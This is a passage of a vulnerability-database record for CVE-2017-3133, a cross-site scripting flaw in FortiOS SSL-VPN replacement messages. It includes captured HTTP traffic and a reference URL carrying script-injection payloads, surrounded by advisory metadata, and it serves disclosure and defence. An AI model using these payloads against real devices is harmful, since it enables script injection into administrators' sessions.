APSCOOKIE_573485771=\"Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A\"; ccsrftoken_573485771=\"592068D7C2B5BDB7A91833DB6A512C14\"; ccsrftoken=\"592068D7C2B5BDB7A91833DB6A512C14\"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D\nDNT: 1\nConnection: close\n\n#2 - Http response:\nHTTP/1.1 200 OK\nDate: Thu, 23 Mar 2017 15:36:33 GMT\nServer: xxxxxxxx-xxxxx\nContent-Security-Policy: frame-ancestors \u0027self\u0027\nExpires: Thu, 23 Mar 2017 15:36:33 GMT\nVary: Cookie,Accept-Encoding\nLast-Modified: Thu, 23 Mar 2017 15:36:33 GMT\nX-UA-Compatible: IE=Edge\nCache-Control: max-age=0\nX-FRAME-OPTIONS: SAMEORIGIN\nSet-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/\nConnection: close\nContent-Type: text/html; charset=utf-8\nContent-Length: 70940\n(...)\n\u003cform id=\"replacemsg_form\"\u003e\n\u003cdiv style=\u0027display:none\u0027\u003e\u003cinput type=\u0027hidden\u0027 name=\u0027csrfmiddlewaretoken\u0027 value=\u0027d58f666c794024295cece8c5b8b6a3ff\u0027 /\u003e\u003c/div\u003e          \u003ctextarea id=\"buffer\" name=\"buffer\"\u003eABC\u003c/textarea\u003e\n\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\n\u003c/textarea\u003e\n(...)\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-3133"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007779"
      },
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "VULHUB",
        "id": "VHN-111336"
      },
      {
        "db": "PACKETSTORM",
        "id": "143543"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-111336",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111336"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-3133",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "100009",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1039020",
        "trust": 1.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "42388",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007779",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1512",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-111336",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143543",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111336"
      },
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007779"
      },
      {
        "db": "PACKETSTORM",
        "id": "143543"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3133"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1512"
      }
    ]
  },
  "id": "VAR-201709-0477",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111336"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:03:22.151000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "FG-IR-17-104",
        "trust": 0.8,
        "url": "http://fortiguard.com/psirt/fg-ir-17-104"
      },
      {
        "title": "Fortinet FortiOS Fixes for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=72205"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007779"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1512"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111336"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007779"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3133"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/100009"
      },
      {
        "trust": 1.7,
        "url": "https://fortiguard.com/advisory/fg-ir-17-104"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/42388/"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1039020"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3133"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-3133"
      },
      {
        "trust": 0.4,
        "url": "http://fortiguard.com/psirt/fg-ir-17-104"
      },
      {
        "trust": 0.3,
        "url": "http://www.fortinet.com/"
      },
      {
        "trust": 0.1,
        "url": "https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3c/script%3e%3cscript%3ealert(\u0027xss\u0027)%3c/script%3e%3cscript%3e"
      },
      {
        "trust": 0.1,
        "url": "https://www.fortinet.com)"
      },
      {
        "trust": 0.1,
        "url": "https://www.fortiguard.com/fos/15832\""
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3131"
      },
      {
        "trust": 0.1,
        "url": "https://192.168.1.99/p/system/replacemsg-group/edit/none/sslvpn/sslvpn-login/"
      },
      {
        "trust": 0.1,
        "url": "https://youtu.be/fcplstcd61q"
      },
      {
        "trust": 0.1,
        "url": "https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3132"
      },
      {
        "trust": 0.1,
        "url": "https://192.168.1.99/ng/fortiview/app/15832\""
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111336"
      },
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007779"
      },
      {
        "db": "PACKETSTORM",
        "id": "143543"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3133"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1512"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-111336"
      },
      {
        "db": "BID",
        "id": "100009"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007779"
      },
      {
        "db": "PACKETSTORM",
        "id": "143543"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3133"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1512"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-09-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-111336"
      },
      {
        "date": "2017-07-28T00:00:00",
        "db": "BID",
        "id": "100009"
      },
      {
        "date": "2017-10-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-007779"
      },
      {
        "date": "2017-07-28T19:22:22",
        "db": "PACKETSTORM",
        "id": "143543"
      },
      {
        "date": "2017-09-12T02:29:00.310000",
        "db": "NVD",
        "id": "CVE-2017-3133"
      },
      {
        "date": "2017-07-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201707-1512"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-09-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-111336"
      },
      {
        "date": "2017-07-28T00:00:00",
        "db": "BID",
        "id": "100009"
      },
      {
        "date": "2017-10-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-007779"
      },
      {
        "date": "2017-09-14T13:53:51.943000",
        "db": "NVD",
        "id": "CVE-2017-3133"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201707-1512"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1512"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Fortinet FortiOS Vulnerable to cross-site scripting",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007779"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "143543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1512"
      }
    ],
    "trust": 0.7
  }
}

cve-2017-3133

Vulnerability from cvelistv5

Published

2017-09-12 02:00

Modified

2024-09-17 01:11

Severity

Summary

A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the Replacement Message HTML for SSL-VPN.

References

URL	Tags
http://www.securityfocus.com/bid/100009	vdb-entry, x_refsource_BID
http://www.securitytracker.com/id/1039020	vdb-entry, x_refsource_SECTRACK
https://fortiguard.com/advisory/FG-IR-17-104	x_refsource_CONFIRM
https://www.exploit-db.com/exploits/42388/	exploit, x_refsource_EXPLOIT-DB

Impacted products

Vendor	Product
Fortinet, Inc.	Fortinet FortiOS

Show details on NVD website